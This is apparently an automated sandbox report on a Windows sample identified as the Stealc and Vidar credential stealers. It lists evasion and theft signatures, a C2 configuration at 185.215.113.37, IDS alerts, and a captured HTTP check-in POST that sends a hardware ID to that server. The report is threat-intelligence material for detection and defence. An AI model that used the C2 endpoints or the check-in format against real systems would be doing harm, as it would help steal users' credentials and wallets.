Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1521524
MD5:	acf1dede1e9bb45ce49ac994c7a0bbdb
SHA1:	9c1a3741398d83ab65643f33e1d9dde128950e45
SHA256:	1c11dea3a27fa828a45aae7c2ed0e44e5d6bc7f696adc85a3d6a1eac1176dd1a
Tags:	exeMarsStealeruser-Bitsight
Infos:

Detection

Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Searches for specific processes (likely to inject)

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 7076 cmdline: "C:\Users\user\Desktop\file.exe" MD5: ACF1DEDE1E9BB45CE49AC994C7A0BBDB)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}

Threatname: Vidar

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000003.1700366205.0000000004E30000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.1902187290.00000000010EE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.1902187290.0000000001162000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 7076	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 7076	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 7076	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 7076	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.file.exe.470000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security

Suricata Signatures

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-28T21:26:07.522916+0200	2044245	1	Malware Command and Control Activity Detected	185.215.113.37	80	192.168.2.4	49732	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-28T21:26:07.516287+0200	2044244	1	Malware Command and Control Activity Detected	192.168.2.4	49732	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-28T21:26:07.743185+0200	2044246	1	Malware Command and Control Activity Detected	192.168.2.4	49732	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-28T21:26:08.840893+0200	2044248	1	Malware Command and Control Activity Detected	192.168.2.4	49732	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-28T21:26:07.749461+0200	2044247	1	Malware Command and Control Activity Detected	185.215.113.37	80	192.168.2.4	49732	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-28T21:26:07.289260+0200	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	49732	185.215.113.37	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-28T21:26:09.066691+0200	2803304	3	Unknown Traffic	192.168.2.4	49732	185.215.113.37	80	TCP
2024-09-28T21:26:14.327749+0200	2803304	3	Unknown Traffic	192.168.2.4	49732	185.215.113.37	80	TCP
2024-09-28T21:26:15.449025+0200	2803304	3	Unknown Traffic	192.168.2.4	49732	185.215.113.37	80	TCP
2024-09-28T21:26:16.215552+0200	2803304	3	Unknown Traffic	192.168.2.4	49732	185.215.113.37	80	TCP
2024-09-28T21:26:16.621356+0200	2803304	3	Unknown Traffic	192.168.2.4	49732	185.215.113.37	80	TCP
2024-09-28T21:26:18.529237+0200	2803304	3	Unknown Traffic	192.168.2.4	49732	185.215.113.37	80	TCP
2024-09-28T21:26:18.928495+0200	2803304	3	Unknown Traffic	192.168.2.4	49732	185.215.113.37	80	TCP

HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJDBAEHIJKJKEBFIEGHIHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 44 42 41 45 48 49 4a 4b 4a 4b 45 42 46 49 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 44 42 41 43 37 46 35 32 31 33 36 33 38 34 38 34 36 38 37 36 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 42 41 45 48 49 4a 4b 4a 4b 45 42 46 49 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 42 41 45 48 49 4a 4b 4a 4b 45 42 46 49 45 47 48 49 2d 2d 0d 0a Data Ascii: ------JJDBAEHIJKJKEBFIEGHIContent-Disposition: form-data; name="hwid"ADBAC7F521363848468766------JJDBAEHIJKJKEBFIEGHIContent-Disposition: form-data; name="build"save------JJDBAEHIJKJKEBFIEGHI--

Source: file.exe, 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1902187290.00000000010EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1902187290.0000000001147000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1902187290.0000000001162000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/freebl3.dll
Source: file.exe, 00000000.00000002.1902187290.0000000001162000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/freebl3.dllGr
Source: file.exe, 00000000.00000002.1902187290.0000000001162000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dll
Source: file.exe, 00000000.00000002.1902187290.0000000001162000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dll
Source: file.exe, 00000000.00000002.1902187290.0000000001162000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dll=r1
Source: file.exe, 00000000.00000002.1902187290.0000000001162000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1902187290.0000000001135000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dll
Source: file.exe, 00000000.00000002.1902187290.0000000001162000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dll_so
Source: file.exe, 00000000.00000002.1902187290.0000000001135000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dllc
Source: file.exe, 00000000.00000002.1902187290.0000000001162000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dll
Source: file.exe, 00000000.00000002.1902187290.0000000001162000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dllQr-
Source: file.exe, 00000000.00000002.1902187290.0000000001162000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dll
Source: file.exe, 00000000.00000002.1902187290.00000000010EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dll#
Source: file.exe, 00000000.00000002.1902187290.00000000010EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dllG
Source: file.exe, 00000000.00000002.1902187290.0000000001147000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll
Source: file.exe, 00000000.00000002.1902187290.0000000001147000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll1#
Source: file.exe, 00000000.00000002.1902187290.00000000010E0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1902187290.0000000001135000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1902187290.0000000001135000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php.
Source: file.exe, 00000000.00000002.1902187290.00000000010E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php3QF2
Source: file.exe, 00000000.00000002.1902187290.0000000001135000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php6
Source: file.exe, 00000000.00000002.1902187290.00000000010E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php=
Source: file.exe, 00000000.00000002.1902187290.00000000010E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php=C
Source: file.exe, 00000000.00000002.1902187290.0000000001135000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpBRx
Source: file.exe, 00000000.00000002.1902187290.00000000010E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpCO
Source: file.exe, 00000000.00000002.1902187290.0000000001147000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpE
Source: file.exe, 00000000.00000002.1902187290.0000000001147000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpGDAAKFHIDBFIDBKFH
Source: file.exe, 00000000.00000002.1902187290.0000000001147000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpGDAAKFHIDBFIDBKFHR
Source: file.exe, 00000000.00000002.1902187290.00000000010E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpVB
Source: file.exe, 00000000.00000002.1902187290.00000000010E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpWi6Fo
Source: file.exe, 00000000.00000002.1902187290.00000000010E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpes
Source: file.exe, 00000000.00000002.1902187290.00000000010E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phps
Source: file.exe, 00000000.00000002.1902187290.0000000001162000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpser
Source: file.exe, 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phption:
Source: file.exe, 00000000.00000002.1902187290.0000000001162000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpus.wallet
Source: file.exe, 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37e2b1563c6670f193.phption:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, file.exe, 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.1924459555.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1915809216.000000001D560000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: BAECFCAA.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000002.1902187290.0000000001162000.00000004.00000020.00020000.00000000.sdmp, BFCGDAAKFHIDBFIDBKFH.0.dr	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: file.exe, 00000000.00000002.1902187290.0000000001162000.00000004.00000020.00020000.00000000.sdmp, BFCGDAAKFHIDBFIDBKFH.0.dr	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: BAECFCAA.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: BAECFCAA.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: BAECFCAA.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.1902187290.0000000001162000.00000004.00000020.00020000.00000000.sdmp, BFCGDAAKFHIDBFIDBKFH.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: file.exe, 00000000.00000002.1902187290.0000000001162000.00000004.00000020.00020000.00000000.sdmp, BFCGDAAKFHIDBFIDBKFH.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: BAECFCAA.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: BAECFCAA.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: BAECFCAA.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: BFCGDAAKFHIDBFIDBKFH.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: KKJDGDHIDBGIECBGHJDBAAKJDH.0.dr	String found in binary or memory: https://support.mozilla.org
Source: KKJDGDHIDBGIECBGHJDBAAKJDH.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: KKJDGDHIDBGIECBGHJDBAAKJDH.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: file.exe, file.exe, 00000000.00000003.1776072174.000000001D46C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: file.exe, 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY
Source: file.exe, 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV
Source: file.exe, 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: file.exe, 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF
Source: file.exe, 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm
Source: file.exe, 00000000.00000002.1902187290.0000000001162000.00000004.00000020.00020000.00000000.sdmp, BFCGDAAKFHIDBFIDBKFH.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: BAECFCAA.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000002.1902187290.0000000001162000.00000004.00000020.00020000.00000000.sdmp, BFCGDAAKFHIDBFIDBKFH.0.dr	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: BAECFCAA.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: KKJDGDHIDBGIECBGHJDBAAKJDH.0.dr	String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: KKJDGDHIDBGIECBGHJDBAAKJDH.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: file.exe, 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: KKJDGDHIDBGIECBGHJDBAAKJDH.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: file.exe, 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
